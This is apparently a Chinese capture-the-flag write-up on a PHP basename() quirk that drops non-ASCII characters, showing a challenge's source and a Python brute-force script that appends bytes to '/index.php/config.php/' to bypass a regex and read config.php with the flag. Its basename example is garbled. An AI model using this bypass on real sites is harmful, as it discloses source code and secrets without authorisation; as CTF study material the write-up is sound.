知识点:
basename 函数,获取路径中的文件名;比如:test/inde.php/s 就会返回index,php
但是漏洞就是,它会去掉文件名开头的或者结尾的非ASCII值!
例题:
代码:
<?php
include 'config.php'; // FLAG is defined in config.php
if (preg_match('/config\.php\/*$/i', $_SERVER['PHP_SELF'])) {
exit("I don't know what you are thinking, but I won't let you read it :)");
}
if (isset($_GET['source'])) {
highlight_file(basename($_SERVER['PHP_SELF']));
exit();
}
$secret = bin2hex(random_bytes(64));
if (isset($_POST['guess'])) {
$guess = (string) $_POST['guess'];
if (hash_equals($secret, $guess)) {
$message = 'Congratulations! The flag is: ' . FLAG;
} else {
$message = 'Wrong.';
}
}
?>
这里正则的绕过,不能让config.php结尾,在它后面加点东西就可以了,比如/a 等等,但是为了使后面的basename得到的结果为config.php,这后面加的东西不能乱加,那么就加非ASCII码的字符就行啦,给个脚本吧
import requests
import re
url='http://317e76c1-04cb-4fcc-87cd-ed754c929a09.node4.buuoj.cn:81/'
payload='/index.php/config.php/'
for i in range(1,255):
payloads=payload+chr(i)+'?source'
urls=url+payloads
print(urls)
r=requests.get(urls)
if 'flag' in r.text:
print(r.text)
print("第几个字符,i",i)
break